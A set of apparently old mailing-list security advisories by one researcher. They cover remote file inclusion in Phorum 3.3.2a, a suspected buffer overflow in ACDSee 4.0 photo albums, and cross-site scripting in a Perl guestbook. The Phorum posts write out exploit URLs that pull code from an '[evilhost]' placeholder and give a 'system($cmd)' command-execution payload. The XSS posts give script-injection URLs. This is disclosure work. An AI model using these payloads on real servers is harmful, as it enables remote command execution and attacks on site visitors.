Phorum 3.3.2a has another bug for remote command execution
Target: Phorum 3.3.2a (maybee older) Description: Phorum 3.3.2a let's remote users execute arbitary code Found by: Markus Arndt[EMAIL PROTECTED] Vendor: http://www.phorum.org Notified Vendor: Yes, already fixed in 3.3.2b Details: Another bug for remote command execution. This time it's admin/actions/del.php :) Some code: ?php require $include_path/delete_message.php; delete_messages($id); QueMessage(Message(s) $id and all children were deleted!br); ? The url to exploit the script would be: http://[vulnerablehost]/phorum/admin/actions/del.php?include_path=http://[evilhost]cmd=ls That url will make the script include http://[evilhost]/delete_message.php GoGoGo and secure your boxes. :) One other thing before i forget: CSS-Attacks are possible on 2 files.. http://[host]/phorum/admin/footer.php?GLOBALS[message]=scriptalert(css strikes!);/script http://[host]/phorum/admin/header.php?GLOBALS[message]=scriptalert(css strikes!);/script Markus Arndt[EMAIL PROTECTED] http://skka.de Keine verlorenen Lotto-Quittungen, keine vergessenen Gewinne mehr! Beim WEB.DE Lottoservice: http://tippen2.web.de/?x=13
Phorum 3.3.2a remote command execution
Target: Phorum 3.3.2a (prior versions?) Description: In Phorum 3.3.2a (a bulletin board) there's a security flaw that lets remote users include external php scripts and execute arbitary code. Found by: Markus Arndt[EMAIL PROTECTED] Vendor: http://www.phorum.org Notified Vendor: Yes, already fixed version available Details: After extracting the Phorum 3.3.2a archive we have lots of php files and subfolders. I just snooped around a bit and found this file vulnerable for remote script inclusion: ./plugin/replace/plugin.php let's see some code: ?php include($PHORUM[settings_dir]/replace.php); function mod_replace_read_body ($body) { global $pluginreplace; reset($pluginreplace); while(list($key,$val) = each($pluginreplace)) { $body = str_replace($key,$val,$body); } return $body; } $plugins[read_body][mod_replace]=mod_replace_read_body; ? Easy one.. http://[target]/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://[evilhost]cmd=ls This one will get the file http://[evilhost]/replace.php and execute it. If [evilhost] has php enabled we could use this one as replace.php: ? echo(? system(\\$cmd\); ?); ? If it's not php-enabled simply: ? system($cmd); ? Markus Arndt[EMAIL PROTECTED] http://skka.de Keine verlorenen Lotto-Quittungen, keine vergessenen Gewinne mehr! Beim WEB.DE Lottoservice: http://tippen2.web.de/?x=13
Possible Buffer Overflow in ACDSee 4.0
While playing around with ACDSee's Photo Albumfiles (ais extension) i noticed a bug that seems to me like a buffer overflow. ACDSee's ais are build up like this: [absolutepath]\filename.gif description [absolutepath]\some.gif mydog [absolutepath]\dunno.gif mycat I filled one description up to 260 chars. Then i loaded the file in ACDSee. Nothing special.. But when i wanted to see the picture's properties the app just crashed. It seems that acdsee can't handle more than 256 chars in the description when displaying the propertie's dialog(or maybee i'm just an idiot ;D). Grab a sample Photoalbumfile at http://skka.de/acdsee_bug.zip;. The included gif has to be placed directly on c:\ because acdsee only allows absolute paths in these files and i couldn't give any relative path to the gif.. :/ Otherwise the ais file will seem not to contain any pictures and you can't trigger the bug by selecting the pic's properties in the context menu. Maybee somebody finds out more.. Markus Arndt[EMAIL PROTECTED] Keine verlorenen Lotto-Quittungen, keine vergessenen Gewinne mehr! Beim WEB.DE Lottoservice: http://tippen2.web.de/?x=13
Philip Chinery's Guestbook 1.1 fails to filter out js/html
Target: Philip Chinery's Guestbook 1.1 (maybee older versions?) Vendor: http://www.sector7g.de.vu Notified Vendor: Sure Affected Systems: Webservers that run Philip Chinery's Guestbook 1.1 Found by: Markus Arndt[EMAIL PROTECTED] Short Description: Philip Chinery's Guestbook 1.1 fails to filter out JScript/HTML (CrossSiteScripting) This nice lil' guestbook let's the owner choose to filter out Jscript- and/or HTML-entrys.. Let's see the start of it's sub where it saves an entry: ---code starts--- sub SaveData { if($kill_html == 1) { $Text =~ s/([^]|\n)*//g; } if($kill_html == 2) { $Text =~ s//lt;/g; $Text =~ s//gt;/g; } if ($kill_java) { $Text =~ s/!--(.|\n)*--//g; } $Text =~ s/\n/nbsp;br/g; $Text =~ tr/|/ /; $Text =~ s/\t/nbsp;nbsp;nbsp;nbsp;nbsp;nbsp;nbsp;nbsp;/g; $Text =~ s/\cM//g; ---code ends--- That's all it filters out.. As we can see it does only filter the comment itself a user wrote! For example the fields Name, EMail or Homepage are NOT checked! So let's build an url to exploit this.. http://[target]/cgi-bin/guestbook.pl?action=signcwrite=noneName=scriptalert(gotcha!);/script[EMAIL PROTECTED]Text=css%20example This would post a message that would display an alertbox on a visiotrs screen when accessing the gb.. As I noticed the guestbook logs ipadresses but doesn't prevent spam. It also automaticly redirects posters back to the mainguestbook-page. That makes it very easy to post entrys that e.g. force visitors to spam the guestbook (really anoying). Sorry for bad english, hope you can understand what i'm talkin' about. ;) Markus Arndt[EMAIL PROTECTED] http://skka.de __ 100 MB und noch mehr gute Gründe! Jetzt anmelden und profitieren. Da ist mehr für Sie drin unter http://club.web.de/?mc=021103